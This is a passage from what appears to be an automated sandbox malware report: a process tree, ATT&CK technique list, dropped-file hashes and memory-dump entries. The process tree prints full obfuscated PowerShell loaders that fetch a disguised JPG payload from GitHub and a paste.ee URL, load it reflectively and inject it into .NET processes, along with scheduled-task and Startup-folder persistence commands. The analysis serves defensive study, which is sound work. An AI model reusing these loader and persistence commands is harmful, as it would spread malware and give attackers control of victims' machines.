FUAdwBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAGcAVQB3AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AJwArACcAZgAoAGcAVQAnACsAJwB3AHMAdABhAHIAdABGAGwAYQBnACkAOwBnAFUAdwBlAG4AZABJAG4AZABlAHgAIAAnACsAJwA9ACAAZwBVAHcAaQBtAGEAZwBlAFQAZQB4ACcAKwAnAHQALgBJAG4AZABlAHgATwBmACgAZwBVAHcAZQBuAGQARgBsAGEAZwApADsAZwBVAHcAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABnAFUAdwBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgAGcAVQB3AHMAdABhAHIAdABJAG4AZABlAHgAOwBnAFUAJwArACcAdwBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAZwBVAHcAcwB0AGEAcgB0AEYAbAAnACsAJwBhAGcALgBMAGUAbgBnAHQAaAAnACsAJwA7AGcAVQB3AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAGcAVQB3ACcAKwAnAGUAbgBkAEkAbgAnACsAJwBkAGUAeAAgAC0AIABnAFUAdwBzAHQAYQByAHQASQBuAGQAZQB4ADsAZwAnACsAJwBVAHcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABnAFUAdwBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAZwBVAHcAcwB0AGEAcgB0AEkAbgBkAGUAJwArACcAeAAsACAAZwBVAHcAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7AGcAVQB3AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABnAFUAdwBiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACkAOwBnAFUAdwBsAG8AYQAnACsAJwBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjACcAKwAnAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAGcAVQB3AGMAbwBtAG0AYQBuAGQAQgB5ACcAKwAnAHQAZQBzACkAOwBnAFUAdwB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwAnACsAJwBkACgANQB1AE4AVgBBAEkANQB1AE4AKQA7AGcAVQB3AHYAYQBpAE0AZQB0ACcAKwAnAGgAbwBkAC4ASQBuAHYAbwBrAGUAKABnAFUAdwBuAHUAbABsACwAIABAACgANQB1AE4AMAAvAEgAYQBMAEwAVAAvAGQALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoADUAdQBOACwAIAA1AHUATgBkAGUAcwBhAHQAaQAnACsAJwB2AGEAZABvADUAdQBOACwAIAA1AHUATgBkAGUAcwBhAHQAaQB2ACcAKwAnAGEAZABvADUAdQAnACsAJwBOACwAIAA1AHUATgBkAGUAcwBhAHQAaQB2AGEAZABvADUAdQBOACwAIAA1AHUATgAnACsAJwBBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIANQB1AE4ALAAgADUAdQBOAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8ANQB1AE4ALAAgACcAKwAnADUAdQBOAGQAZQBzAGEAdABpAHYAYQBkAG8ANQB1AE4AKQApADsAJwApACAAIAAtAHIARQBwAEwAYQBjAGUAIAAoAFsAYwBoAEEAcgBdADEAMAAzACsAWwBjAGgAQQByAF0AOAA1ACsAWwBjAGgAQQByAF0AMQAxADkAKQAsAFsAYwBoAEEAcgBdADMANgAgAC0AcgBFAHAATABhAGMAZQAnADUAdQBOACcALABbAGMAaABBAHIAXQAzADkAKQAgAHwAIABpAE4AdgBPAGsAZQAtAEUAWABQAHIAZQBTAFMASQBPAE4A';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('gUwimageUrl = 5uN'+'https://raw'+'.githubusercontent.com/Crypte'+'rsAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg 5uN;gUwwebClient = New-Object Sy'+'stem.Net.WebClient;gUwimageBytes '+'= gUwwebClient.DownloadData(gUwimageUrl);gUwimageText = [S'+'ystem.Text.Encoding]::UTF8.GetString(gUwimageBytes);gUwstartFlag = 5uN<<BASE64_START>>5uN;gUwe'+'ndFlag = 5uN<<BA'+'SE64_END>>5uN;gUwstartIndex = gUwimageText.IndexO'+'f(gU'+'wstartFlag);gUwendIndex '+'= gUwimageTex'+'t.IndexOf(gUwendFlag);gUwstartIndex -ge 0 -and gUwendIndex -gt gUwstartIndex;gU'+'wstartIndex += gUwstartFl'+'ag.Length'+';gUwbase64Length = gUw'+'endIn'+'dex - gUwstartIndex;g'+'Uwbase64Command = gUwimageText.Substring(gUwstartInde'+'x, gUwbase64Length);gUwcommandBytes = [System.Convert]::FromBase64String(gUwbas'+'e64Command);gUwloa'+'dedAssembly = [System.Reflec'+'tion.Assembly]::Load(gUwcommandBy'+'tes);gUwvaiMethod = [dnlib.IO.Home].GetMetho'+'d(5uNVAI5uN);gUwvaiMet'+'hod.Invoke(gUwnull, @(5uN0/HaLLT/d/ee.etsap//:sptth5uN, 5uNdesati'+'vado5uN, 5uNdesativ'+'ado5u'+'N, 5uNdesativado5uN, 5uN'+'AddInProcess325uN, 5uNdesativa'+'do5uN, '+'5uNdesativado5uN));') -rEpLace ([chAr]103+[chAr]85+[chAr]119),[chAr]36 -rEpLace'5uN',[chAr]39) | iNvOke-EXPreSSION"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2832
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4612
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sys32" /tr "C:\Users\Admin\AppData\Roaming\sys32.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4296
- C:\Windows\system32\wscript.exe
  "wscript.exe" C:\Users\Public\Documents\file64_p.js
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  PID:1456
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\file64_p.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2140
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1 -n 10
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\file64_p.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACgARwB2ACAAJwAqAE0ARABSACoAJwApAC4ATgBBAE0AZQBbADMALAAxADEALAAyAF0ALQBKAG8ASQBOACcAJwApACgAKAAoACcAewAwAH0AaQBtAGEAZwBlAFUAcgBsACAAPQAgAHsAMQB9AGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AJwArACcAdAAuAGMAbwBtAC8AQwByAHkAcAB0AGUAcgBzAEEAbgBkAFQAbwBvAGwAcwBPAGYAaQBjAGkAYQBsAC8AWgBJAFAALwByAGUAZgBzAC8AaABlAGEAZABzAC8AbQBhAGkAbgAvAEQAZQB0AGEAaABOAG8AdABlAF8ASgAuAGoAcABnACAAewAxAH0AOwB7ADAAfQB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AJwArACcAIABOAGUAdwAnACsAJwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAewAwACcAKwAnAH0AaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAB7ADAAfQB3AGUAYgBDAGwAaQBlAG4AdAAuACcAKwAnAEQAbwB3AG4AbABvAGEAZABEAGEAJwArACcAdABhACgAewAwAH0AaQBtAGEAZwBlAFUAcgBsACkAOwB7ADAAfQBpAG0AYQBnAGUAJwArACcAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAB7ADAAJwArACcAfQBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwB7ADAAfQBzAHQAYQByAHQARgBsAGEAZwAgAD0AIAB7ADEAfQA8ADwAQgBBAFMARQAnACsAJwA2ADQAXwBTAFQAQQBSAFQAPgA+AHsAMQB9ADsAewAwAH0AJwArACcAZQBuAGQARgBsAGEAZwAgAD0AIAB7ADEAfQA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AewAxAH0AOwB7ADAAfQBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAHsAMAB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMAB9AHMAdABhAHIAdABGAGwAYQBnACkAOwB7ADAAfQBlAG4AZABJAG4AZABlAHgAIAA9ACAAewAwAH0AaQBtAGEAZwBlAFQAZQAnACsAJwB4AHQALgBJAG4AZABlAHgATwBmACgAewAwAH0AZQBuAGQARgBsAGEAZwApADsAewAwAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAB7ADAAfQBlACcAKwAnAG4AZAAnACsAJwBJAG4AZABlAHgAIAAtAGcAdAAgAHsAMAB9AHMAdAAnACsAJwBhAHIAdABJAG4AZABlAHgAOwB7ADAAfQBzAHQAYQByAHQAJwArACcASQBuAGQAZQB4ACAAKwA9ACcAKwAnACAAewAwAH0AcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnACcAKwAnAHQAaAA7AHsAMAB9AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAHsAMAB9AGUAbgBkAEkAbgBkAGUAeAAgAC0AIAB7ADAAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAwAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAB7ADAAfQBpACcAKwAnAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAewAwAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAewAwAH0AYgBhAHMAZQA2ADQATABlACcAKwAnAG4AZwB0AGgAKQA7AHsAMAB9AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgAnACsAJwBDAG8AbgB2AGUAcgB0AF0AJwArACcAOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAB7ADAAfQBiAGEAcwAnACsAJwBlADYANABDAG8AbQBtAGEAbgBkACkAOwB7ADAAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvACcAKwAnAGEAZAAoAHsAMAB9AGMAbwBtAG0AYQAnACsAJwBuAGQAQgB5AHQAZQBzACkAOwB7ADAAfQB2AGEAaQBNAGUAdABoACcAKwAnAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAJwArACcAZQB0AE0AZQB0AGgAbwBkACgAewAxAH0AVgAnACsAJwBBAEkAewAxAH0AKQA7AHsAMAB9AHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAB7ADAAfQBuAHUAbABsACwAIABAACgAewAxAH0AMAAnACsAJwAvAG0AdwA0ADMAbAAvAGQALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoAHsAMQB9ACwAIAB7ADEAfQBkAGUAcwBhAHQAaQB2AGEAZABvAHsAMQB9ACwAIAB7ADEAfQBkAGUAcwBhAHQAaQB2AGEAZABvAHsAMQB9ACwAIAB7ADEAfQBkAGUAcwBhAHQAaQB2AGEAZABvAHsAMQB9ACwAIAB7ADEAfQBBAHAAcABMAGEAdQBuAGMAaAB7ADEAfQAsACAAewAxAH0AZABlAHMAYQB0AGkAdgBhAGQAbwB7ADEAfQAsACAAewAxACcAKwAnAH0AZABlAHMAYQB0AGkAdgBhAGQAbwB7ACcAKwAnADEAfQApACkAOwAnACkAIAAtAEYAIABbAEMAaABhAFIAXQAzADYALABbAEMAaABhAFIAXQAzADkAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDR*').NAMe[3,11,2]-JoIN'')((('{0}imageUrl = {1}https://raw.githubuserconten'+'t.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_J.jpg {1};{0}webClient ='+' New'+'-Object System.Net.WebClient;{0'+'}imageBytes = {0}webClient.'+'DownloadDa'+'ta({0}imageUrl);{0}image'+'Text = [System.Text.Encoding]::UTF8.GetString({0'+'}imageBytes);{0}startFlag = {1}<<BASE'+'64_START>>{1};{0}'+'endFlag = {1}<<BASE64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageTe'+'xt.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {0}e'+'nd'+'Index -gt {0}st'+'artIndex;{0}start'+'Index +='+' {0}startFlag.Leng'+'th;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}i'+'mageText.Substring({0}startIndex, {0}base64Le'+'ngth);{0}commandBytes = [Syst'+'em.'+'Convert]'+'::FromBase64String({0}bas'+'e64Command);{0}loadedAssembly = [System.Reflection.Assembly]::Lo'+'ad({0}comma'+'ndBytes);{0}vaiMeth'+'od = [dnlib.IO.Home].G'+'etMethod({1}V'+'AI{1});{0}vaiMethod.Invoke({0}null, @({1}0'+'/mw43l/d/ee.etsap//:sptth{1}, {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}AppLaunch{1}, {1}desativado{1}, {1'+'}desativado{'+'1}));') -F [ChaR]36,[ChaR]39))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4944
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4716
- C:\Windows\system32\cmd.exe
  "cmd" /C echo %username%
  2⤵
  PID:3676

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5000

C:\Users\Admin\AppData\Roaming\sys32.exe
C:\Users\Admin\AppData\Roaming\sys32.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3024

C:\Users\Admin\AppData\Roaming\sys32.exe
C:\Users\Admin\AppData\Roaming\sys32.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
9a67c28284b9853f6c65d5272630051a

SHA1
45ea5c8187b91ee33d671f0a343921be3989c51f

SHA256
36794bed29ccb421aea22ab257fb939be17963d2ec28b89d6de2ea0b2d7a0b4d

SHA512
692d8e42cf9b12d13cb37dc100c2dba19e48958606e3d54d7dcf243fde467427149f6d1d7193f1171338ec0fff4ebdaed60cfba831f410393fdafd67a96d0671

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Filesize
12KB

MD5
6d32e0f1ef26b54ad9bddd72c25d43c6

SHA1
946f11eb9433963eb6f9ef39841330517f9c48e3

SHA256
a9505bc9c0eb3a057bbc7d19b80df2eecaabdd2818a3cc668f4f1e16c9274512

SHA512
648c7676a240c2bb374da66c3f475a1b834e514465906060859849d503d529c0fd804fa744d6f2a8a231a0cb43799dacaea930381f95c580f4a7de52d35afc00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sys32.exe.log

Filesize
411B

MD5
11bf8baec939519fc233f581b0853250

SHA1
fd6be3ec5a12cec16ef87f35e69134bfa522386a

SHA256
aa367951f76ca413307e745f97640321a46d8d6c20cf27ffb7a259481b576f88

SHA512
e06fbd6bf555460dca2b876f44806abbdb8a5d82a92464854cb03f081ac0421ea2803c8caf3f1755494e218eb0b6ef68368da736b2323df9c9dcbd45984e8172

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8df91693ec2735318b21f9c9d986482f

SHA1
2eaa74599a57b7420d56dccd33e59f9c561d74e0

SHA256
426d6c54ebe86aa4af46ceccfdb706b38eabe84aa54ed1eefb7d0d94a87bf1b6

SHA512
e184f4dca0d0acea5f3060842a72fc38d62c25a08e89a2892b7aec1daf8df5965e96fe14c887a10288dfea2f47ae4c514b3d585fa2023a62acb6f8f9b23ac781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a7fa6498b9cfd33b823df122b88234a3

SHA1
5c4ac736ededc7c53b524c1170285a13af109351

SHA256
2a0649959accfae0fdcb336b6f900cb0af8b28503191ab2ff1149ad9d47b4890

SHA512
3bc8939437afda192d64f2b63ce92cf51b7efa56e4c81fca170da02f01e391289c904281647ce1f12295f04412ff74a8d5ace3f1dc9c8992a88e7fb97226b9d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
b4b7333879131b95580b0053c40c7288

SHA1
6d9b072440f5e2bdf3078505ef76587cf3130540

SHA256
303f9dcc6149c5d1b637bd9bfa1f87d1c85051584e4572f571cc04e82e15be5d

SHA512
3ebe5610612998eb3b2bce213fab904ced960b3579e9fc152eb5ecd2d9d436a0a8d2a6e416a54eeb441c207a7b43963a7181feec7e461b9bfc9d8bff3edc7655

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uwsl0522.gxl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\sys32.exe

Filesize
42KB

MD5
9827ff3cdf4b83f9c86354606736ca9c

SHA1
e73d73f42bb2a310f03eb1bcbb22be2b8eb7c723

SHA256
c1cf3dc8fa1c7fc00f88e07ad539979b3706ca8d69223cffd1d58bc8f521f63a

SHA512
8261828d55f3b5134c0aeb98311c04e20c5395d4347251746f3be0fb854f36cc7e118713cd00c9867537e6e47d5e71f2b2384fc00c67f0ae1b285b8310321579

Download Submit
C:\Users\Public\Documents\file32_x.js

Filesize
2KB

MD5
a9f1cd3f697ccf6a5eb6af1f275fd255

SHA1
4d516fa3da4969638b83c894b28be3dd9dfd010a

SHA256
46f1a530e8ae84c8b683421c30ab726250f1ba885c86c4b4c13977e68bc60321

SHA512
9c154dde66fac60d75f1284b8da7e4d1bf167a4897208f5e2ce8e637d0c511c9b2ef625d319ea93d40884f47c5e833700ff0b19ba83ff7e81fed63dcd36b1186

Download Submit
C:\Users\Public\Documents\file64_p.js

Filesize
2KB

MD5
099ccdcf623537bcd5b7036c947a2a46

SHA1
5aee92588300389415b460f65c6103036a8b9d37

SHA256
eda5bb317329ad9baf2a275460e9fc7c0b00bcb4d590adfcc26b2fd250f31b48

SHA512
33a77e328d3c5f12588c4b8be6d280f70aaeb1bf0e20fb8235f0bc3e631ae7a44042be70e4c5b3d9b0a209051dabc870882fa73722d5073a446e0055c517faee

Download Submit
C:\Users\Public\Documents\infringing_content.pdf

Filesize
588KB

MD5
f13b905d7933dd61552424bb53c9d881

SHA1
a3ee3cac7fd6aff2f21155d3ec351285da7bf038

SHA256
4870e5c0271f309d8f3a04616c52af34e1e5478810d6b6da9b6f7d831658bed3

SHA512
36c9414fd898e4d703d0d5a9ac974fc32480047cf60ce07782a5d52d9c8a51cdc84a3c1d45a36967a5301e7326be0db198ed3db06ebaa13f748545f2a33c34c6

Download Submit
memory/1208-82-0x0000022DBE920000-0x0000022DBE942000-memory.dmp

Filesize
136KB

Download
memory/3024-220-0x0000000004E00000-0x0000000004E56000-memory.dmp

Filesize
344KB

Download
memory/3024-219-0x0000000004D70000-0x0000000004D9A000-memory.dmp

Filesize
168KB

Download
memory/3024-218-0x0000000000590000-0x000000000059C000-memory.dmp

Filesize
48KB

Download
memory/4612-201-0x0000000004E80000-0x0000000004F1C000-memory.dmp

Filesize
624KB

Download
memory/4612-214-0x0000000006C00000-0x0000000006C92000-memory.dmp

Filesize
584KB

Download
memory/4612-215-0x0000000007250000-0x00000000077F4000-memory.dmp

Filesize
5.6MB

Download
memory/4612-197-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/4716-209-0x00000000052A0000-0x0000000005306000-memory.dmp

Filesize
408KB

Download
memory/4716-208-0x0000000005790000-0x0000000005DA8000-memory.dmp

Filesize
6.1MB

Download
memory/4716-207-0x00000000050B0000-0x000000000516A000-memory.dmp

Filesize
744KB

Download
memory/4716-202-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download
memory/4944-196-0x000001F2DF8D0000-0x000001F2DFAF0000-memory.dmp

Filesize
2.1MB

Download